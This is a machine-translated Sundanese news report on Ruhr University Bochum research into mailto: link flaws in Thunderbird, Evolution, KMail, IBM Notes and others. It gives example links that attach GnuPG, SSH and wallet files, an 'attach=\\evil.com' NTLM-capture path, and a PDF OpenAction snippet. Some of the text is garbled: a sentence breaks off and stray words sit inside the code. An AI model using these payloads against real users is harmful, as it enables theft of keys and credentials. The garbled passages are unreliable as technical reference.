Panaliti ti Universitas Ruhr Bochum (Jerman)
Tumbu «
Klien surat Thunderbird, Évolusi GNOME (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM / HCL Notes (CVE-2020-4089) sareng Pegasus Mail rentan ka serangan sepele anu ngamungkinkeun anjeun otomatis ngagantelkeun sagala file lokal, dieusian via link kawas "mailto:? attach = path_to_file". File napel tanpa nembongkeun peringatan, jadi tanpa perhatian husus, pamaké bisa jadi teu aya bewara yen surat bakal dikirim kalawan kantétan.
Salaku conto, nganggo tautan sapertos "mailto:[email dijaga]&subject=Judul&body=Teks&attach=~/.gnupg/secring.gpg" anjeun tiasa nyelapkeun konci pribadi tina GnuPG kana hurup. Anjeun oge bisa ngirim eusi dompet crypto (~/.bitcoin/wallet.dat), konci SSH (~/.ssh/id_rsa) jeung sagala file diaksés ku pamaké. Leuwih ti éta, Thunderbird ngidinan Anjeun pikeun ngagantelkeun grup file ku mask ngagunakeun constructs kawas "gantelkeun = / tmp / * .txt ".
Salian file lokal, sababaraha klien email ngolah tautan ka panyimpenan jaringan sareng jalur dina server IMAP. Khususna, IBM Notes ngamungkinkeun anjeun nransferkeun file tina diréktori jaringan nalika ngolah tautan sapertos "attach=\\evil.com\dummyfile", ogé nyegat parameter auténtikasi NTLM ku ngirim tautan ka server SMB anu dikontrol ku panyerang. (pamenta bakal dikirim ku pamaké parameter auténtikasi ayeuna).
Thunderbird suksés ngolah pamundut sapertos "attach = imap: // / fetch> UID> / INBOX> 1 /", anu ngamungkinkeun anjeun ngagantelkeun eusi tina polder dina server IMAP. Dina waktos anu sami, seratan anu dicandak tina IMAP, énkripsi ngalangkungan OpenPGP sareng S/MIME, otomatis didekripsi ku klien surat sateuacan dikirim. Pamekar Thunderbird éta
Versi heubeul Thunderbird ogé rentan ka dua varian serangan séjén dina PGP jeung S/MIME diusulkeun ku peneliti. Khususna, Thunderbird, kitu ogé OutLook, PostBox, eM Client, MailMate sareng R2Mail2, tunduk kana serangan ngagantian konci, disababkeun ku kanyataan yén klien surat otomatis ngimpor sareng masang sertipikat anyar anu dikirimkeun dina pesen S/MIME, anu ngamungkinkeun panyerang pikeun ngatur substitusi konci umum anu parantos disimpen ku pangguna.
Serangan kadua, anu Thunderbird, PostBox sareng MailMate rentan, ngamanipulasi fitur mékanisme pikeun nyimpen draf pesen otomatis sareng ngamungkinkeun, ngagunakeun parameter mailto, pikeun ngamimitian dekripsi pesen énkripsi atanapi tambihan tanda tangan digital pikeun pesen anu sawenang, kalayan pangiriman saterusna hasilna ka server IMAP panyerang. Dina serangan ieu, ciphertext dikirimkeun ngaliwatan parameter "awak", sareng tag "meta refresh" dianggo pikeun ngamimitian telepon ka server IMAP panyerang. Salaku conto: ' '
Pikeun ngolah tautan "mailto:" sacara otomatis tanpa interaksi pangguna, dokumén PDF anu dirancang khusus tiasa dianggo - tindakan OpenAction dina PDF ngamungkinkeun anjeun ngaluncurkeun panangan mailto sacara otomatis nalika muka dokumen:
%PDF-1.5
1 obj
<< / Tipe / Katalog / OpenAction [2 0 Urang Sunda] >>
endobj
2 obj
<< /Type /Action /S /URI/URI (mailto:?body=——Mimitian PESAN PGP——[…])>>
endobj
sumber: opennet.ru